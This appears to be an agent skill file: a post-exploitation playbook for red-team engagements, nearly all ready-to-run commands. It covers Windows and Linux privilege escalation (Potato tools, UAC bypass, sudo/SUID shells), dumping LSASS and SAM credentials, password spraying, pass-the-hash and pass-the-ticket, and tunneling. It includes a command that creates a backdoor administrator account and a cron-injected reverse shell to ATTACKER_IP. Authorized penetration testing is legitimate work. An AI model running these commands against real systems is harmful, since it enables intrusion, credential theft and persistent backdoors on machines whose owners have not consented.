| name | post-exploit |
| description | Post-exploitation — privilege escalation (Windows Potato/UAC/SUID/sudo), credential access (LSASS/SAM/Responder/spray), and lateral movement (Pass-the-Hash/WMI/tunneling). Applies after initial foothold for VAPT/red team engagements. |
Post-Exploitation
After initial foothold, the goal is: escalate → extract credentials → move laterally → reach crown jewels.
Initial Access
└─► Privilege Escalation ─► Credential Access ─► Lateral Movement
│
└─► (repeat on new host)
Scope note: Post-exploitation techniques are for authorized VAPT/red team engagements only, not bug bounty programs.
1. Privilege Escalation — Windows
Token Impersonation (Potato Family)
# GodPotato — widest OS support (Win 8-11, Server 2012-2022)
# Requires: SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
GodPotato.exe -cmd "whoami"
GodPotato.exe -cmd "net user backdoor P@ssw0rd /add && net localgroup administrators backdoor /add"
# PrintSpoofer — Win 10, Server 2016-2019
PrintSpoofer.exe -i -c cmd
# Check privileges before choosing
whoami /priv
# Look for: SeImpersonatePrivilege — present in IIS AppPool, SQL Server, Network Service
| Tool | OS Range | Prerequisite |
|---|
| GodPotato | Win 8-11, 2012-2022 | SeImpersonatePrivilege |
| PrintSpoofer | Win 10, 2016-2019 | SeImpersonatePrivilege + Spooler running |
| SigmaPotato | Extended | SeImpersonatePrivilege |
UAC Bypass
# fodhelper.exe bypass (works when ConsentPromptBehaviorAdmin != 2)
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Windows\Temp\payload.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
fodhelper.exe
reg delete HKCU\Software\Classes\ms-settings /f # cleanup
# Check UAC level first
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
# ConsentPromptBehaviorAdmin = 5 → bypassable
# ConsentPromptBehaviorAdmin = 2 → NOT bypassable (highest security)
Service Abuse
# Find unquoted service paths
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """"
# Check service permissions
accesschk.exe /accepteula -uwcqv "USERNAME" *
# If SERVICE_CHANGE_CONFIG granted:
sc config SERVICE_NAME binpath= "C:\Windows\Temp\payload.exe"
sc stop SERVICE_NAME && sc start SERVICE_NAME
Automated Enumeration
# winPEAS — full enumeration
winPEASx64.exe | tee C:\Windows\Temp\winpeas.txt
winPEASx64.exe servicesinfo windowscreds # focused
# SharpUp
SharpUp.exe audit
2. Privilege Escalation — Linux
SUID/Capabilities
find / -perm -4000 -type f 2>/dev/null | tee suid.txt
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
/usr/bin/find / -name x -exec /bin/sh -p \; -quit
getcap -r / 2>/dev/null
Sudo Misconfigurations
sudo -l
sudo vim -c ':!sh'
sudo awk 'BEGIN {system("/bin/sh")}'
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo find / -name x -exec /bin/sh \; -quit
sudo env /bin/sh
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Cron Jobs
cat /etc/crontab && ls -la /etc/cron.d/ && ls -la /etc/cron.*
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/scripts/backup.sh
./pspy64 | tee pspy.txt
Automated Enumeration
./linpeas.sh -a 2>&1 | tee linpeas.txt
./linux-exploit-suggester.sh | tee kernel_vulns.txt
3. Credential Access
LSASS Dump — Windows
# comsvcs.dll (no tool upload — living off the land)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full
# Mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > mimikatz.txt
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit" # Kerberos tickets
# SAM/SYSTEM hive (no LSASS access needed)
reg save HKLM\SAM C:\Windows\Temp\SAM
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
reg save HKLM\SECURITY C:\Windows\Temp\SECURITY
# → parse offline: secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
Remote Credential Extraction
secretsdump.py 'DOMAIN/USER:PASS@TARGET' -outputfile secretsdump_TARGET
secretsdump.py 'DOMAIN/USER:PASS@DC_IP' -just-dc -outputfile dc_hashes
Network Credential Capture
responder -I eth0 -dwPv 2>&1 | tee responder.log
ntlmrelayx.py -t smb://TARGET -smb2support
Password Spraying
nxc smb TARGET -u users.txt -p 'Spring2026!' --continue-on-success | tee spray.log
nxc smb SUBNET/24 -u 'admin' -p passwords.txt | grep '+' | tee spray_results.log
kerbrute passwordspray -d DOMAIN --dc DC_IP users.txt 'Spring2026!'
Hash Cracking
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 5600 netntlmv2.txt /usr/share/wordlists/rockyou.txt
unshadow /etc/passwd /etc/shadow > unshadowed.txt
hashcat -m 1800 unshadowed.txt rockyou.txt
4. Lateral Movement
Pass-the-Hash (Windows)
nxc smb SUBNET/24 -u 'USER' -H 'NTLM_HASH' | grep '+' | tee pth_results.log
wmiexec.py 'DOMAIN/USER@TARGET' -hashes :NTLM_HASH
psexec.py 'DOMAIN/USER@TARGET' -hashes :NTLM_HASH
evil-winrm -i TARGET -u 'USER' -H 'NTLM_HASH'
Pass-the-Ticket (Kerberos)
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"
mimikatz.exe "kerberos::ptt ticket.kirbi" "misc::cmd" "exit"
Rubeus.exe dump /service:krbtgt /nowrap
Rubeus.exe ptt /ticket:BASE64_TICKET
Network Tunneling / Pivoting
./proxy -selfcert -laddr 0.0.0.0:11601
./agent -connect ATTACKER_IP:11601 -ignore-cert
chisel server -p 8080 --reverse
chisel client ATTACKER_IP:8080 R:1080:socks
ssh -L 5432:INTERNAL_DB:5432 USER@JUMP_HOST -N
MITRE ATT&CK Quick Reference
| Technique | ID | Tool |
|---|
| Token Impersonation | T1134.001 | GodPotato, PrintSpoofer |
| UAC Bypass | T1548.002 | fodhelper, eventvwr |
| Service Abuse | T1574.001 | sc.exe, accesschk |
| SUID Exploitation | T1548.001 | GTFOBins |
| LSASS Dump | T1003.001 | Mimikatz, comsvcs.dll |
| SAM Hive | T1003.002 | reg save, secretsdump.py |
| Responder Poisoning | T1557.001 | Responder |
| Password Spraying | T1110.003 | NetExec, kerbrute |
| Pass-the-Hash | T1550.002 | NetExec, Impacket |
| Pass-the-Ticket | T1550.003 | Rubeus, Mimikatz |
| Protocol Tunneling | T1572 | Ligolo-ng, Chisel |